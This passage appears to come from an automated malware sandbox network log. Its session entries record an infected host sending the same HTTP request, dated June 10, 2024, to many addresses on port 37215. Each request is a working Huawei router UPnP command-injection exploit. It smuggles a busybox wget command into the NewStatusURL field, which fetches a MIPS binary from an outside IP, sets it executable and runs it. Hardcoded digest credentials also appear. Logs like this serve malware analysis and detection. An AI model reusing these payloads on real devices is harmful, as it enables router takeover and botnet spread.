20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            922192.168.2.133724041.38.242.6737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.326433897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            923192.168.2.133308041.214.197.20437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.327608109 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            924192.168.2.1354668156.55.146.6237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.328658104 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            925192.168.2.1332898197.164.110.22137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.329651117 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            926192.168.2.1356522156.6.14.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.330858946 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            927192.168.2.1339210156.63.216.13737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.331995964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            928192.168.2.135693641.161.117.7537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.332837105 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            929192.168.2.1335416197.10.141.1137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.333914995 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            930192.168.2.1341106156.235.241.23137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.334846973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            931192.168.2.1343016156.31.22.2737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.337250948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            932192.168.2.1359222197.79.56.17337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.338475943 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
